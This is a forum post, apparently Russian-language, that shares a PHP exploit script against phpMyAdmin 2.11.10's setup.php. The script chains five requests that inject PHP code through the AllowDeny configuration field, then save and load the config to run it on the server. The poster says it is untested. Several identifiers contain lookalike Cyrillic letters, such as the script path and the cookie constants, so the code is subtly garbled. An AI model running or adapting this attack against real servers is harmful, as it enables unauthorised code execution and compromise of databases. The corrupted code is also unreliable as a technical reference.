sorahistory
Сообщений: 116
Оценки: 0
Присоединился: 2010-06-18 04:40:54.406666
|
<?php
// this is an exploit code for phpMyAdmin 2.11.10
$target_url = "http://web/phpmyadmin/sсriрts/setup.php";
$token = null;
// request 1
$res = get_response();
// request 2 (add server)
$res = get_response('POST', "token=$token&action=addserver");
// request 3 (save to session)
$res = get_response('POST', "token=$token&action=addserver_real&host=localhost&connect_type=tcp&extension=mysql&auth_type=config&user=root&password=1&submit_save=Add&AllowDeny_order=1&AllowDeny[a][b]['.phpinfo().']=1");
// request 4 (save to file)
$res = get_response('POST', "token=$token&action=save");
// request 5 (load file)
$res = get_response('POST', "token=$token&action=load");
var_dump($res);
function get_response($method='GET', $bоdу=null) {
global $target_url, $token;
static $ch = null;
if ($ch === null) $ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $target_url);
if ($method == 'POST') {
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $bоdу);
}
curl_setopt($ch, CURLOPT_cооkieFILE, '/tmp/cооkie.txt');
curl_setopt($ch, CURLOPT_cооkieJAR, '/tmp/cооkie.txt');
$res = curl_exec($ch);
$token = get_token($res);
return $res;
}
function get_token($s) {
if (preg_match('#name="token" value="(.*?)"#', $s, $m)) {
return $m[1];
}
} Долго искал,нашел не пробовал на работоспособность!
|